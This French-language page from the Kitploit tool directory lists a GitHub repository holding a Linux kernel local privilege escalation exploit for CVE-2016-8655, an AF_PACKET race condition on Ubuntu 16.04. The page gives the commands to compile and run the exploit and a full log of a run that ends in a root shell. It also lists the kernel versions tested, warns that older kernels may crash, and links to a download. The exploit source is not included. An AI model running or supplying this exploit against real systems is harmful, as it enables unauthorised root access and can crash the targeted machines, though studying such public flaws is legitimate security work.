Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/lakshmidesai/cve-2016-8655
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation de Binaires
GitHublakshmidesai/cve-2016-8655

CVE-2016-8655

Exploit d'escalade de privilèges locale du noyau Linux pour CVE-2016-8655, ciblant une condition de course AF_PACKET sur Ubuntu 16.04 x86_64 pour obtenir un shell root via la manipulation de la mémoire.

Voir le dépôt
54il y a 9 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ocobo_root.c exploit de condition de course AF_PACKET sous Linux exploit pour Ubuntu 16.04 x86_64

user@ubuntu:$ gcc chocobo_root.c -o chocobo_root -lpthread user@ubuntu:$ ./chocobo_root

making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 174222, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0, race won === please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... vsyscall page altered!

stage 1 completed registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 30773, last val = 0) current packet version = 2 pbd->hdr.bh1.offset_to_first_pkt = 48 race not won

retrying stage.. new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850 sockets allocated removing barrier and spraying.. version switcher stopping, x = -1 (y = 133577, last val = 2) current packet version = 0 pbd->hdr.bh1.offset_to_first_pkt = 48 === TPACKET_V1 && offset_to_first_pkt != 0, race won === please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that. closing socket and verifying....... sysctl added!

stage 2 completed binary executed by kernel, launching rootshell root@ubuntu:~# id uid=0(root) gid=0(root) groups=0(root),1000(user)

==============================

Des offsets sont inclus pour les noyaux plus anciens, mais ils ne sont pas testés, donc sachez que cet exploit risque de planter les noyaux antérieurs à 4.4.

testé sur : Ubuntu 16.04: 4.4.0-51-generic Ubuntu 16.04: 4.4.0-47-generic Ubuntu 16.04: 4.4.0-36-generic Ubuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu

Remerciements à : jsc pour l'inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI) mcdelivery pour avoir livré des hotcakes et du café

11/2016 par rebel

Télécharger l’outil